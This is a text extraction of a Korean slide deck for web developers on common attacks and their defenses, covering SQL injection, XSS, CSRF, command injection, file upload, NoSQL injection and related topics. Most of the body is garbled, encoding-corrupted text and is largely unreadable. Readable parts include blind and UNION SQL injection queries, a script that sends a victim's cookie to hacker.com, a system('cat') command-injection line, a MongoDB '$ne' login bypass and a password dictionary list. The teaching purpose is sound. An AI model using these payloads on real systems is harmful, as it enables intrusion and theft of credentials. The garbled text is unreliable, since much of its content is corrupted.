웹 개발을 위해 꼭 알아야하는 보안 공격

ਢѐߊਸਤ೧ ԙঌইঠೞחࠁউҕѺ 2021. 02. 22 ੉ࢶഈ

য়ט੄ݾ಴ ਢࠁউী؀೧੉೧ೞҊӝୡҕѺӝߨҗ೧Ѿߑߨਸ੉೧ೠ׮

ਢࠁউ ਢࢎ੉౟੄ஂড੼ਸҕѺೞחӝࣿ੸ਤഈਵ۽ ਢಕ੉૑ܳాೞৈ ӂೠ੉হחदझమী੽ӔೞѢաؘ੉ఠਬ୹߂౵Ҧ৬э਷೯ਤ݈ܳೠ׮ https://ko.wikipedia.org/wiki/ਢ_೧ఊ

ೠࣽр੄पࣻ۽ࢲ࠺झоݎೡࣻب੓׮😨

ցޖ׮নೠҕѺӝߨj 42-*OKFDUJPO 944 $43'"UUBDL 'JMF6QMPBE"UUBDL $PNNBOE*OKFDUJPO #VGGFS0WFSGMPX %JDUJPOBSZ"UUBDL

੹ࠗחইפ؊ۄبӝୡ੸ੋѪ਷ ԙঌইىঠೠ׮

ঌইঠೞחҕѺӝߨ 4UBSU

42-*OKFDUJPO ↟ࢲߡীࢲप೯غח42-ਸঈ੄੸ਵ۽੉ਊೞחҕѺ ↟ӝઓ42-ীঈ੄੸ੋ42-ਸࢗੑೠ׮ ↟ؘ੉ఠఎஂ ࢏ઁ١੉оמೞ׮ ↟ڦܻݶࢲ࠺झઙܐп

42-*OKFDUJPOࢎ۹

42-*OKFDUJPOߑয ↟42-ীࢲౠ߹ೠ੄޷ܳо૑חޙ੗ܳ੉झா੉೐ೠ׮ FY =O =U ] j
↟ળ࠺ػࢶ঱ਸࢎਊೠ׮ ↟ਃ્਷ۄ੉࠳۞ܻ ೐ۨ੐ਕ௼ীࢲই઱ੜ݄ইળ׮

42-*OKFDUJPOबച ↟&SSPSCBTFE42-*OKFDUJPO ↟ੌࠗ۞42-ী۞ܳߊࢤदெਗೞח੿ࠁܳஂٙೠ׮ ↟௪ܻޙ୶ஏ %#ݺ ప੉࠶ݺ١੄ஂٙ੉оמೞ׮

42-*OKFDUJPOबച ↟#MJOE42-*OKFDUJPO ↟2VFSZѾҗ੄ଵѢ૙ਸࠁҊਗೞח੿ࠁо ઓ੤ೞח૑ঌࣻ੓׮ ୶ۿ ↟%# 5BCMFݺਸঌࣻ੓׮ ↟42-.BQ ex)
SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#

42-*OKFDUJPOबച ↟6OJPO42-*OKFDUJPO ↟6OJPOݺ۸ਸ੉ਊೞৈ੿ࠁܳஂٙೠ׮ ex) SELECT * FROM users WHERE user_id
= '1' or 1=1 UNION SELECT '',id,pw from users#

944 ↟$SPTF4JUF4DSJQUJOH ↟ਢಕ੉૑ীঈࢿझ௼݀౟ܳࢗੑೞחҕѺ ↟ࢎ੉౟੉ਊ੗੿ࠁܳఎஂೡࣻ੓׮ ↟ڦܻݶ݆਷Ѫਸ੏ח׮

944ࢎ۹ <script>document.URL='http://hacker.com?'+document.cookie</script> ѱद౸ ੉ਊ੗о Ӗਸ ੍ਸ ٸ ష௾ ఎஂ!!!

944ߑয ↟)5.-೙ఠ݂ਸೠറ%#ী੷੢ೠ׮ FY TDSJQU IUNM IFBE NFUB jj
↟݅ডਸਤ೧೐ۿ౟ূ٘ীࢲب೙ఠ݂ೠ׮

944बച ↟খࢲࣗѐೠߑध਷4UPSFE944 ↟3FGMFDUFE944 ↟%0.#BTFE944

944बച ↟3FGMFDUFE944 ↟Ѩ࢝য١ਸࠁৈ઱חҔীझ௼݀౟ܳबחҕѺ ↟63-ਸࢎਊ੗ীѱ־ܰѱٜ݅ݶҕѺࢿҕ https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>

944बച ↟%0.#BTFE944 ↟%0.ীঈ੄੸ੋझ௼݀౟ܳबחҕѺ ↟࠳ۄ਋੷о೧ࢳೞחױ҅ীࢲߊࢤغחҕѺ

$43'"UUBDL ↟$SPTT4JUF3FRVFTU'PSHFSZ ↟ҕѺ੗оࢎਊ੗ܳ੉ਊೞৈਢࢎ੉౟ী ਃ୒ਸࠁղחҕѺ

$43'"UUBDLࢎ۹ о૞ ૓૞ admin 1q2w3e4r ۽Ӓੋ ਃ୒ ࢿҕ/पಁ ࢿҕ೮ਵݶ ੷੢

$43'"UUBDLߑয ↟3FGFSSFS$IFDL ↟ೲਊೠبݫੋ݅ਃ୒ೲۅೞب۾ࢸ੿ ↟$43'5PLFO ↟ݽٚਃ୒ীష௾ਸߊәೞৈࢲߡীࢲѨૐ ↟$"15$)" ↟ࢎۈ੉ਃ୒ೠѪ੉ݏח૑Ѩૐ

$PNNBOE*OKFDUJPO ↟গ೒ܻா੉࣌ীࢲࢎਊغחदझమݺ۸ীঈ੄੸ੋ ݺ۸যܳࢗੑೞחҕѺ 8FC4IFMM"UUBDL ↟ࢲߡSPPUӂೠਸஂٙೡࣻ੓׮ ↟ڦܻݶࢲ࠺झઙܐп

$PNNBOE*OKFDUJPOࢎ۹ )BDLFS UFYUUYUJGDPOGJH system("cat ${var}") FYFDVUF 8FC4IFMM

$PNNBOE*OKFDUJPOߑয ↟оә੸दझమೣࣻחࢎਊ9 ↟޹хೠޙ੗ܳ೙ఠ݂ FY ]

'JMF6QMPBE"UUBDL ↟ঈࢿझ௼݀౟౵ੌਸস۽٘ೞחҕѺ ↟স۽٘റ౵ੌਤ஖ܳ଺ইप೯दఃݶҕѺࢿҕ ↟ڦܻݶࢲ࠺झઙܐп

'JMF6QMPBE"UUBDLࢎ۹ Upload 1 2 Command WebShell

'JMF6QMPBE"UUBDLߑয ↟ഛ੢੗౵ੌఋੑѨࢎ ↟স۽٘౵ੌਸդࣻചೞৈ੷੢ ↟ౠࣻޙ੗оನೣػ҃਋স۽٘Ә૑ (Null byte Injection ߑয)

+BWBTDSJQU*OKFDUJPO ↟$MJFOU4JEFীࢲ+BWBTDSJQUܳࢗੑदఃחҕѺ ↟௼܁DPOTPMF١ਸా೧ઑ੘оמೞ׮ ↟$MJFOU4JEFী޹хೠؘ੉ఠܳ֍ਸ҃਋ఎஂоמ

+BWBTDSJQU*OKFDUJPOࢎ۹

+BWBTDSJQU*OKFDUJPOߑয ↟$MJFOU4JEFূ޹хೠ੿ࠁܳ੺؀֍૑ঋח׮ ↟ؘ੉ఠਬബࢿѨࢎо೙ਃೠ҃਋ࢲߡ৬ాनೠ׮ $MJFOUীࢲѨࢎೞݶউػ׮

%%P4 ↟%JTUSJCVUFE%FOJBMPG4FSWJDF ↟ࢲߡী࠺੿࢚੸ਵ۽݆਷౟ې೗ਸࠁղחҕѺ ↟ࢲ࠺झо݃࠺غҊ݆਷࠺ਊ੉ࣗݽػ׮

%%P4ࢎ۹ Zombie PC Traﬃc

%%P4ߑয ↟ઁੌױࣽೠؘઁੌ݄ӝয۵׮ ↟ഛ੢оמೠࢲ࠺झҳઑࢸ҅ ↟*1೙ఠ݂ ↟ࣛܖ࣌ҳݒj

%JDUJPOBSZ"UUBDL ↟޷ܻࢎ੹ী١۾೧֬਷ޙ੗ৌਸঐഐ۽؀ੑೞחҕѺ ↟#SVUF'PSDF੄ੌઙ

%JDUJPOBSZ"UUBDLࢎ۹ admin apple banana cyber . . . 1q2w3e4r

%JDUJPOBSZ"UUBDLߑয ↟੄޷о੓חޙ੗ৌ਷ঐഐ۽١۾ޅೞب۾ࢸ੿ ↟"DDPVOU-PDLPVU1PMJDZ ↟GBDUPSੋૐ

3BJOCPX5BCMF ↟೧दೣࣻܳ੉ਊೠಣޙਸݽف੷੢दெ֬਷಴ ↟҅੿ఎஂറঐഐਗޙਸঌইղӝਤ೧ࢎਊ

3BJOCPX5BCMFߑয ↟4BMUࢎਊ ↟,FZ4USFUDIJOH ↟1#,%' #DSZQU١੄ঐഐചঌҊ્ܻࢎਊ

.POHP%#*OKFDUJPO ↟42-*OKFDUJPO୊ۢঈ੄੸ੋчਸ֍য %#ܳઑ੘ೞחҕѺ ↟ڦܻݶࢲ࠺झઙܐп

.POHP%#*OKFDUJPOࢎ۹ db.collection.ﬁnd({ "email": "[email protected]", "password": password }) db.collection.ﬁnd({ "email": "[email protected]",
"password": { "$ne": "-" }) password = { "$ne": "-" }

.POHP%#*OKFDUJPOߑয ↟৔ೱਸ઴ࣻ੓חޙ੗ܳ೙ఠ݂ೠ׮ FY \ ^ < >

#VGGFS0WFSGMPX ↟#VGGFS0WFSGMPXܳా೧׮ܲݫݽܻী੽ӔೞחҕѺ ↟׮ܲݫݽܻী੽Ӕ߂ઁযооמೞӝٸޙী஖ݺ੸ ↟दझమ೧ఊӝߨ੉ӝبೞ׮ ↟ڦܻݶࢲ࠺झઙܐп

웹 개발을 위해 꼭 알아야하는 보안 공격

웹 개발을 위해 꼭 알아야하는 보안 공격

More Decks by Lee Sun-Hyoup

Other Decks in Programming

Featured

Transcript